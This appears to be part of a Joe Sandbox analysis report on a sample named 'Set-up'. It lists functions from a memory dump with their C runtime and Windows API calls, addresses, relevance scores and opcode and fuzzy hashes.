Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
String ID:
API String ID: 2881127307-0
Opcode ID: 774129fc0776bb6673eb72020f491caf84550be98a46b136400492167eee9088
Instruction ID: bb3de089c556f329c4d24edba5ef598b4aca691afcbbd3ab503a556606b4d839
Opcode Fuzzy Hash: 774129fc0776bb6673eb72020f491caf84550be98a46b136400492167eee9088
Instruction Fuzzy Hash: 5BF03A72A00665AADA20BAB68C0EFAF3B6CAB45754F444525B611E7080DFBCE5058BA1

Function 6BBBF612 Relevance: 9.3, APIs: 6, Instructions: 261COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 6BBBF713
__FindPESection.LIBCMT ref: 6BBBF72D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 0f64f514995c9f663cc021a2bdc2ddf66b08ed9f3c3be3a17472ab3e88cbab3f
Instruction ID: 80ac477c3043893b1eada7ae5314e21c381fa37375c8bedc6a9a71be17788af9
Opcode Fuzzy Hash: 0f64f514995c9f663cc021a2bdc2ddf66b08ed9f3c3be3a17472ab3e88cbab3f
Instruction Fuzzy Hash: 6991063AE006899FDB05CF6AD890B7DB3B5EB85354F11416DD855A73A0EF39E802CB90

Function 6BB79F09 Relevance: 9.1, APIs: 6, Instructions: 145threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BB79F16
TlsSetValue.KERNEL32(?), ref: 6BB79F29
TlsSetValue.KERNEL32(00000000), ref: 6BB7A08D
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7A0B2
_CxxThrowException.MSVCR100(?,6BB7A0C8), ref: 6BB7A0C0
std::exception::exception.LIBCMT(?,?,?,6BB7A0C8), ref: 6BB7A0E3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Value$Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
String ID:
API String ID: 1797647509-0
Opcode ID: 6f1344355fff83851adf0e655ffc38dae26c131638cc7bf1cb690aa61d4a18af
Instruction ID: 7d42bbf37bd94847a348d4f16a8c713a1f4907a3a3eda69872d4e476b53e1d61
Opcode Fuzzy Hash: 6f1344355fff83851adf0e655ffc38dae26c131638cc7bf1cb690aa61d4a18af
Instruction Fuzzy Hash: E251C631604285AFDB25BF74C845BADBB75BF42308F0445B9D0A55B292CB3EE81ACB90

Function 6BB4C106 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

_lock.MSVCR100(0000000B,6BB4C170,00000018,6BB4C42D,00000000,?), ref: 6BB4C12D

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

EnterCriticalSection.KERNEL32(?,6BB4C170,00000018,6BB4C42D,00000000,?), ref: 6BB4C1A8
_lock.MSVCR100(0000000A,6BB4C170,00000018,6BB4C42D,00000000,?), ref: 6BB4C1FA
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB4C170,00000018,6BB4C42D,00000000,?), ref: 6BB4C215
_calloc_crt.MSVCR100(00000020,00000040,6BB4C170,00000018,6BB4C42D,00000000,?), ref: 6BB704BD

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalSection$Enter_lock$CountInitializeSpin_calloc_crt
String ID:
API String ID: 988982517-0
Opcode ID: 17afd25d133719160837cc416100a7a233a93a1466e436cb0b80207d94889ffe
Instruction ID: 06cb7aded58948f3bb695c86ee976850f689640dfdf4a435add26d99aeed0a7c
Opcode Fuzzy Hash: 17afd25d133719160837cc416100a7a233a93a1466e436cb0b80207d94889ffe
Instruction Fuzzy Hash: 6341F271D04791CBEB208FA8C84479EBBB0FB02B64F2482AAD075AB1D4C7BDD945DB51

Function 6BB451A2 Relevance: 9.1, APIs: 6, Instructions: 93COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6BB452A5,?,?,?), ref: 6BB451E5
_memset.LIBCMT(00000000,00000000,00000000,?,?,?,6BB452A5,?,?,?,?,?,?,?,?,?), ref: 6BB4522B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BB45240
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6BB4524E
_freea_s.MSVCR100(00000000), ref: 6BB45258
malloc.MSVCR100(00000008,?,?,?,6BB452A5,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB70CF1

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
String ID:
API String ID: 2935806426-0
Opcode ID: 85ef14931709daa215493c5a53b433f6cf7df6a2ba81bf2524c6b8c84b2470b0
Instruction ID: 22eac082d8a0e43d6556e59bdb2d709bc81a89cba67c70f6893e3fb39d3e0a03
Opcode Fuzzy Hash: 85ef14931709daa215493c5a53b433f6cf7df6a2ba81bf2524c6b8c84b2470b0
Instruction Fuzzy Hash: 5F317C71600A8AAFEF008FA4DC80DAF7BA9FB09354F100466FA14D7254D739DD60ABA4

Function 6BB4087F Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

_errno.MSVCR100(?,?,?,6BB40936,?,?,00000000), ref: 6BB67946
_invalid_parameter_noinfo.MSVCR100(?,?,?,6BB40936,?,?,00000000), ref: 6BB67950
_errno.MSVCR100(?,?,?,?,6BB40936,?,?,00000000), ref: 6BB6795C
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,6BB40936,?,?,00000000), ref: 6BB67966
_errno.MSVCR100(?,?,?,?,6BB40936,?,?,00000000), ref: 6BB67972
_errno.MSVCR100(?,?,?,?,?,6BB40936,?,?,00000000), ref: 6BB67991

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
Instruction ID: 76ff523e44e4a103ebde7786ab1b89ba4a6ef6cbe51930536bccbeb1345feec9
Opcode Fuzzy Hash: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
Instruction Fuzzy Hash: C4219A32650392EBD7245F39C8C129E73A1FF62754B60413FE8058B298F7B88880D791

Function 6BB4921F Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB49260

Part of subcall function 6BB42939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB4297D

_towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6BB49273
_errno.MSVCR100(?), ref: 6BB6C4F8
_invalid_parameter_noinfo.MSVCR100(?), ref: 6BB6C503
_errno.MSVCR100(?,?), ref: 6BB6C51E
_invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB6C529

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
String ID:
API String ID: 3991495309-0
Opcode ID: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
Instruction ID: 4a2e88ab11ec7a8f3504310c535690ac7cea5153bb4d8e55ede6ed64ce5d7832
Opcode Fuzzy Hash: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
Instruction Fuzzy Hash: 8D3135728005E59BDF208BA8CC4277D37A0FF42664F600289E4B09B1C9EB3CCD40E761

Function 6BB520BE Relevance: 9.1, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

_strnicoll_l.MSVCR100(0000006B,?,?,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB52115

Part of subcall function 6BB5204F: _strnicmp_l.MSVCR100(0000006B,?,0000006B,0000006B,7FFFFFFF,00000000,00000000,0000006B,?,0000006B,0000006B,?,?,0000006B), ref: 6BB520A9

_errno.MSVCR100(0000006B,0000006B,?,?,0000006B), ref: 6BB6AAE4
_invalid_parameter_noinfo.MSVCR100(0000006B,0000006B,?,?,0000006B), ref: 6BB6AAEF
_errno.MSVCR100(?,0000006B,0000006B,?,?,0000006B), ref: 6BB6AB0A
_invalid_parameter_noinfo.MSVCR100(?,0000006B,0000006B,?,?,0000006B), ref: 6BB6AB15
__crtCompareStringA.MSVCR100(?,?,00001001,0000006B,?,?,?,00000000,?,0000006B,0000006B,?,?,0000006B), ref: 6BB6AB33

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
String ID:
API String ID: 1477060370-0
Opcode ID: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
Instruction ID: 6f9158abb15936b810a5065b6f9da8f44e249219bafab0996f224e02fa572bef
Opcode Fuzzy Hash: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
Instruction Fuzzy Hash: B121B1329012D9EFCF119FA8C8819AD7B65EF01368B144299E1305B1A5FB398960DF52

Function 6BB580BC Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB580EF
_calloc_crt.MSVCR100(00000001,00000002), ref: 6BB679E6
_errno.MSVCR100 ref: 6BB679F3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CurrentDirectory_calloc_crt_errno
String ID:
API String ID: 1856998256-0
Opcode ID: 4ada8ca2daab68f64f2aa5119e57cfb6fb40a2f98c684d8e7b7f34ce21cb168e
Instruction ID: 817c65835506530a7fb2002730661a26faddbaa5f07c1bda8bec2eff081c54f1
Opcode Fuzzy Hash: 4ada8ca2daab68f64f2aa5119e57cfb6fb40a2f98c684d8e7b7f34ce21cb168e
Instruction Fuzzy Hash: 36213D739403D89FD7206F39CC85B9D73B8EB51754F0141A9D404D7290DBBC8E848BA2

Function 6BB7D8E1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB7D8E8
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000), ref: 6BB7D903

Part of subcall function 6BB8214D: std::exception::exception.LIBCMT(6BB81FE2,?,6BB81FE2,00000001), ref: 6BB8216C
Part of subcall function 6BB8214D: _CxxThrowException.MSVCR100(?,6BBE0018,6BB81FE2), ref: 6BB82181

??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB7D913
??2@YAPAXI@Z.MSVCR100(000000F8,00000000), ref: 6BB7D921
??2@YAPAXI@Z.MSVCR100(000000D0,00000000), ref: 6BB7D951
??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB7D978

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ??2@??3@Policy$Concurrency@@ElementExceptionH_prolog3Key@2@@Policy@SchedulerThrowValue@std::exception::exception
String ID:
API String ID: 2052542019-0
Opcode ID: e9fc0ec600be537bfe3bfc2d36213d6014018dae284e950740a9924cd8b959d2
Instruction ID: 8858aff6b48549a07b8cb9f6c1b3b5b6ded0f6be86b6fed136af67baa1c2dd1d
Opcode Fuzzy Hash: e9fc0ec600be537bfe3bfc2d36213d6014018dae284e950740a9924cd8b959d2
Instruction Fuzzy Hash: 9711A3B1584196AADF21EFB4EC05BAFBBA0BF11394F400469A124F70D0DB7C8A00D760

Function 6BB853E4 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB853EB
??_V@YAXPAX@Z.MSVCR100(?,00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?,?,?,6BB855C8,?,00000000,6BB85EC0), ref: 6BB85440
??3@YAXPAX@Z.MSVCR100(?,00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?,?,?,6BB855C8,?,00000000,6BB85EC0), ref: 6BB85447
Concurrency::unsupported_os::unsupported_os.LIBCMT(00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?,?,?,6BB855C8,?,00000000,6BB85EC0,?), ref: 6BB85454
_CxxThrowException.MSVCR100(?,6BBDFE24,00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?,?,?,6BB855C8,?,00000000), ref: 6BB85462
??1event@Concurrency@@QAE@XZ.MSVCR100(00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?,?,?,6BB855C8,?,00000000,6BB85EC0,?), ref: 6BB8546E

Part of subcall function 6BB8538C: __uncaught_exception.MSVCR100(?,?,?,?,6BB75C86,00000001), ref: 6BB853A1

Part of subcall function 6BB85538: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR100(?,?,00000001,?,?,6BB8542B,00000000,00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000,?), ref: 6BB85568
Part of subcall function 6BB85538: ??3@YAXPAX@Z.MSVCR100(?,?,?,00000001,?,?,6BB8542B,00000000,00000014,6BB762AC,?,00000000,?,6BB84D05,00000001,00000000), ref: 6BB8556E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ??3@Concurrency@@$??1_??1event@Collection@details@Concurrency::unsupported_os::unsupported_osExceptionH_prolog3TaskThrow__uncaught_exception
String ID:
API String ID: 3788188742-0
Opcode ID: f76ff447e6c1f6b7784baa2daaf2c12cf93361527956e885f0870940d643808d
Instruction ID: ce4311e5579a0e3ed0d3afc782dea590d92648268defb992b6c512a5f129a994
Opcode Fuzzy Hash: f76ff447e6c1f6b7784baa2daaf2c12cf93361527956e885f0870940d643808d
Instruction Fuzzy Hash: 6A016831A413C04BDB14DB70C452BAE7371EF01759F98019CE2A75B1A4DB7CE906C744

Function 6BB4A7FB Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB4A880,00000010), ref: 6BB4A8A4
__doserrno.MSVCR100(6BB4A880,00000010), ref: 6BB6F4DE
_errno.MSVCR100(6BB4A880,00000010), ref: 6BB6F4E6
_errno.MSVCR100(6BB4A880,00000010), ref: 6BB6F4FC
_invalid_parameter_noinfo.MSVCR100(6BB4A880,00000010), ref: 6BB6F507
_errno.MSVCR100(6BB4A880,00000010), ref: 6BB6F50E

Part of subcall function 6BB4A5A9: EnterCriticalSection.KERNEL32(00000108,6BB4A610,0000000C,6BB5038E,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?), ref: 6BB4A5FA

Part of subcall function 6BB4A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB4A865,?,6BB4A880,00000010), ref: 6BB4A795
Part of subcall function 6BB4A78A: _get_osfhandle.MSVCR100(?), ref: 6BB4A7B8
Part of subcall function 6BB4A78A: CloseHandle.KERNEL32(00000000), ref: 6BB4A7BF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
String ID:
API String ID: 1720121285-0
Opcode ID: 45d628881594f2a4939449dc1062f5883ee192c762a17940d87ef3c0425471cd
Instruction ID: f57cdf2f44ca0a672fa2631735e05c58abf520232033016ac2e3faec876d800e
Opcode Fuzzy Hash: 45d628881594f2a4939449dc1062f5883ee192c762a17940d87ef3c0425471cd
Instruction Fuzzy Hash: 091188718003848FDB119FB8C98275D77A0BF02329F6102A5D0245B6E9DBBC8941AEA1

Function 6BB4A8DF Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__freebuf.LIBCMT ref: 6BB4A903

Part of subcall function 6BB4A8AE: free.MSVCR100(?,?,?,6BB4A908,?,?), ref: 6BB4A8C5

_fileno.MSVCR100(?,?,?), ref: 6BB4A909
_close.MSVCR100(00000000,?,?,?), ref: 6BB4A90F
_errno.MSVCR100 ref: 6BB68B94
_invalid_parameter_noinfo.MSVCR100 ref: 6BB68B9F

Part of subcall function 6BB4A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB4A900,?), ref: 6BB4A694
Part of subcall function 6BB4A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB4A900,?), ref: 6BB4A69B

free.MSVCR100(?), ref: 6BB68BB4

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
String ID:
API String ID: 1941134952-0
Opcode ID: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
Instruction ID: 827068a742e68ab59bb0c43d4623d87bc87f5118e1dfee8762fa493337086468
Opcode Fuzzy Hash: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
Instruction Fuzzy Hash: 4EF02233901B902BD620163A8C01B4F33A8BF877B9F050A35E928831C4FB3CC8026FA1

Function 6BB58163 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB5816A
_errno.MSVCR100 ref: 6BB58171
_wfullpath.MSVCR100(?,?,?), ref: 6BB58182

Part of subcall function 6BB41E61: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB41EA6

_errno.MSVCR100 ref: 6BB5818C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePath_wfullpath
String ID:
API String ID: 3755888649-0
Opcode ID: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
Instruction ID: 35e94116bcdb272f20e9de74f52b9b9b84fae1137653881f5a2203000f8769dd
Opcode Fuzzy Hash: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
Instruction Fuzzy Hash: 68F06235500244AFCB021F35CC02B5D3B61FF86799F4500A0E9185B224FB7988209BA2

Function 6BB4FB0D Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_errno.MSVCR100(00000000,00000000,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB55BD5
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6A1A9

Strings

$, xrefs: 6BB4FB47

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: $
API String ID: 2959964966-3993045852
Opcode ID: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
Instruction ID: fd64a911653fa286ab4dfb638df0e6b09796ff25cff663326f1a2585bbe4cac8
Opcode Fuzzy Hash: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
Instruction Fuzzy Hash: 067102309886DACBDF11CF68C4503AE3BB1FF02358F1001AAD8A45B1D5E3BC8A91DB51

Function 6BB41AB5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6BB41BF0,?,?,?,00000000), ref: 6BB41AFE

Strings

$, xrefs: 6BB41AE3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: iswctype
String ID: $
API String ID: 304682654-3993045852
Opcode ID: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
Instruction ID: 5c6a5cc7cc6cceaab771d965c1d9428d29cd2eeba2ca48a33a51bd23b76e9438
Opcode Fuzzy Hash: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
